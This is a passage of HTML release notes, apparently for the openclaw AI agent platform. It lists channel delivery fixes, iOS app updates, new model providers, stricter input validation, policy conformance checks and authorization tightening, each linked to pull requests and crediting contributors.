<li>Channel delivery and session identity got safer across outbound plugin hooks, Matrix room ids, iMessage reactions/approvals, Slack final replies, Discord recovered tool warnings, WhatsApp profile auth roots, Telegram polling, and Microsoft Teams service URL trust checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465217648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83304/hovercard" href="https://github.com/openclaw/openclaw/pull/83304">#83304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529579598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87160/hovercard" href="https://github.com/openclaw/openclaw/pull/87160">#87160</a>)</li>
<li>Mobile and chat surfaces got a broader refresh: the iOS Pro UI, Gateway chat transport, onboarding, Talk permissions, WebChat reconnect delivery, and session picker behavior now preserve more state across reconnects and empty searches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537867197" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87531" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87531/hovercard" href="https://github.com/openclaw/openclaw/pull/87531">#87531</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541460557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87682/hovercard" href="https://github.com/openclaw/openclaw/pull/87682">#87682</a>)</li>
<li>Browser, channel, and automation inputs are stricter: Browser tool timeouts, viewport/tab indices, Gateway ports, cron retry handling, Discord component ids, schema array refs, Telegram callback pages, and channel progress callbacks now reject malformed values earlier and preserve the intended delivery context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462211584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82887" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82887/hovercard" href="https://github.com/openclaw/openclaw/pull/82887">#82887</a>)</li>
<li>Provider, media, and document coverage expands with Claude Opus 4.8, Fal Krea image schemas, NVIDIA featured models, MiniMax streaming music responses, encrypted PDF extraction, voice model catalogs, GitHub Copilot agent runtime support, and a Codex Supervisor plugin path for delegated Codex workflows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545001692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87845/hovercard" href="https://github.com/openclaw/openclaw/pull/87845">#87845</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545739723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87890/hovercard" href="https://github.com/openclaw/openclaw/pull/87890">#87890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542757246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87751/hovercard" href="https://github.com/openclaw/openclaw/pull/87751">#87751</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544160876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87794/hovercard" href="https://github.com/openclaw/openclaw/pull/87794">#87794</a>)</li>
<li>CLI, auth, doctor, and provider paths fail faster and recover more clearly: malformed numeric/version options are rejected, workspace dotenv provider credentials are ignored, OAuth and local service startup requests are bounded, legacy <code>api_key</code> auth profiles migrate to canonical form, and restart guidance is actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470260031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83655" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83655/hovercard" href="https://github.com/openclaw/openclaw/pull/83655">#83655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538477112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87559/hovercard" href="https://github.com/openclaw/openclaw/pull/87559">#87559</a>)</li>
<li>Plugin and Gateway hot paths do less repeated work while preserving cache correctness for install records, config JSON parsing, tool search catalogs, session stores, manifest model rows, auto-enabled plugin config, browser tokens, and viewer assets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>)</li>
<li>Release, QA, and E2E validation now bound more log, artifact, harness, and cross-OS waits so failing lanes produce proof instead of hanging or false-greening.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Status: show active subagent details in status output.</li>
<li>Diffs: split the default language pack and expand default Diffs language coverage while keeping the host floor aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534535212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87370/hovercard" href="https://github.com/openclaw/openclaw/pull/87370">#87370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534563692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87372/hovercard" href="https://github.com/openclaw/openclaw/pull/87372">#87372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>ClawHub: add plugin display names plus skill verification and trust surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534140530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87354/hovercard" href="https://github.com/openclaw/openclaw/pull/87354">#87354</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>iOS: refresh the dev app with Pro Command, Chat, Agents, and Settings tabs wired to gateway sessions, diagnostics, chat, and realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Docs: clarify Codex computer-use setup, paste-token stdin auth setup, macOS gateway sleep troubleshooting, native Codex hook relay recovery, container model auth, install deployment cards, device-token admin gating, CLI setup flow compatibility, and backport targets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533118068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87313/hovercard" href="https://github.com/openclaw/openclaw/pull/87313">#87313</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223303633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63050/hovercard" href="https://github.com/openclaw/openclaw/pull/63050">#63050</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541567603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87685" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87685/hovercard" href="https://github.com/openclaw/openclaw/pull/87685">#87685</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bdjben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bdjben">@bdjben</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a>.</li>
<li>PDF/tools: use ClawPDF for PDF extraction, support encrypted PDF extraction, and surface MCP structured content in agent tool results. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541241418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87670" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87670/hovercard" href="https://github.com/openclaw/openclaw/pull/87670">#87670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542757246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87751/hovercard" href="https://github.com/openclaw/openclaw/pull/87751">#87751</a>)</li>
<li>Providers: add Claude Opus 4.8 support, Fal Krea image model schemas, NVIDIA featured model catalogs, MiniMax streaming music responses, and provider-backed voice model catalogs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545001692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87845/hovercard" href="https://github.com/openclaw/openclaw/pull/87845">#87845</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545739723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87890/hovercard" href="https://github.com/openclaw/openclaw/pull/87890">#87890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544160876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87794/hovercard" href="https://github.com/openclaw/openclaw/pull/87794">#87794</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/GitHub: add the GitHub Copilot agent runtime and the Codex Supervisor plugin package.</li>
<li>Discord: show commentary in progress drafts so live Discord runs expose useful in-progress context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499607477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85200/hovercard" href="https://github.com/openclaw/openclaw/pull/85200">#85200</a>)</li>
<li>Plugin SDK: add a reply payload sending hook for plugins that need to deliver channel-owned replies and flatten package types for SDK declarations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461890496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82823" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82823/hovercard" href="https://github.com/openclaw/openclaw/pull/82823">#82823</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529621686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87165" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87165/hovercard" href="https://github.com/openclaw/openclaw/pull/87165">#87165</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Policy: add policy comparison, ingress-channel conformance, and sandbox-posture conformance checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506435604" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85572" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85572/hovercard" href="https://github.com/openclaw/openclaw/pull/85572">#85572</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508594455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85744" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85744/hovercard" href="https://github.com/openclaw/openclaw/pull/85744">#85744</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521746245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86768" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86768/hovercard" href="https://github.com/openclaw/openclaw/pull/86768">#86768</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents: fall back to local config pruning when the optional <code>agents delete</code> Gateway probe cannot authenticate, so offline installs can still delete agents without removing shared workspaces.</li>
<li>Tighten phone-control mutation authorization [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529379329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87150/hovercard" href="https://github.com/openclaw/openclaw/pull/87150">#87150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Clarify directive persistence authorization policy [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515051227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86369" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86369/hovercard" href="https://github.com/openclaw/openclaw/pull/86369">#86369</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Agents/Codex: keep spawned agent cwd/workspace state separated, keep hook context prompt-local, release session locks on timeout abort and runtime teardown, avoid session event queue self-wait, clean up exec abort listeners, stream assistant deltas incrementally, recover raw missing-thread compaction failures, preserve shared app-server state across startup or helper failures, keep native hook relay alive across restarts and prune stale bridge files, keep Claude live tool progress visible for watchdog recovery, suppress abandoned requester completion handoff, route workspace memory through tools, resolve Codex runtime models first, report quarantined dynamic tools, format <code>skills</code> command output, and bound compaction/steering retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512236257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86123/hovercard" href="https://github.com/openclaw/openclaw/pull/86123">#86123</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332970426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72574/hovercard" href="https://github.com/openclaw/openclaw/issues/72574">#72574</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534791510" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87383/hovercard" href="https://github.com/openclaw/openclaw/pull/87383">#87383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535326369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87400" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87400/hovercard" href="https://github.com/openclaw/openclaw/pull/87400">#87400</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462962983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83022" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83022/hovercard" href="https://github.com/openclaw/openclaw/pull/83022">#83022</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541273558" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87671/hovercard" href="https://github.com/openclaw/openclaw/pull/87671">#87671</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542561311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87738" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87738/hovercard" href="https://github.com/openclaw/openclaw/pull/87738">#87738</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542726387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87747" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87747/hovercard" href="https://github.com/openclaw/openclaw/pull/87747">#87747</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542013718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87706/hovercard" href="https://github.com/openclaw/openclaw/pull/87706">#87706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538196198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87546" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87546/hovercard" href="https://github.com/openclaw/openclaw/pull/87546">#87546</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538136913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87541" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87541/hovercard" href="https://github.com/openclaw/openclaw/pull/87541">#87541</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alix-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alix-007">@Alix-007</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjf">@sjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels: thread canonical session keys into outbound hooks, preserve Matrix room-id case, keep fallback tool warnings mention-inert, retain delivered Slack final replies during late cleanup, continue iMessage polling after denied reactions, suppress duplicate native exec approvals, preserve Telegram SecretRef prompt config and polling keepalives, preserve WhatsApp profile auth roots, QR display, document filenames, and plugin hook config, suppress Discord recovered tool warnings, preserve the Discord voice outbound helper, and block untrusted Teams service URLs while keeping TeamsSDK patterns aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536746747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87465" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87465/hovercard" href="https://github.com/openclaw/openclaw/pull/87465">#87465</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370029391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76262/hovercard" href="https://github.com/openclaw/openclaw/pull/76262">#76262</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465217648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83304/hovercard" href="https://github.com/openclaw/openclaw/pull/83304">#83304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538876168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87581" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87581/hovercard" href="https://github.com/openclaw/openclaw/pull/87581">#87581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374077022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77114" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77114/hovercard" href="https://github.com/openclaw/openclaw/pull/77114">#77114</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515934850" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86426" data-hovercard-type="pull_request" 